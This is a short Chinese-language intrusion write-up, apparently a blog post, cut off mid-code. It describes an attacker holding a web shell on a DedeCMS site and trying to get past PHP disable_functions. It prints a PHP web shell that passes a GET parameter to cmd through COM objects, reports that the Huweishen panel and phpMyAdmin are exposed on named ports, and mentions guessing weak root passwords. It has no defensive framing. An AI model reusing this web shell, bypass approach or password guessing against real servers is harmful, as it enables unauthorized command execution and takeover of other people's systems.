一个dede的站shell,看了下 disable_functions
exec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod,escapeshellarg,escapeshellcmd,sh2_exec,proc_terminate,proc_close
而且也不支持pcntl_exec函数,MySQL低权限用户,尝试COM组件<?php
$command=$_GET['a'];
$wsh = new COM('Shell.Application'); //WScript.Shell
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
无回显,COM组件的WScript.Shell、Shell.Application也不支持,这条路无路可走。
只能另辟蹊径 。
通过路径名称发现是护卫神,并确定6588端口是护卫神999端口是phpmyadmin 对root试了几个弱口令也没戏<?php
function httpGet() {
$url = '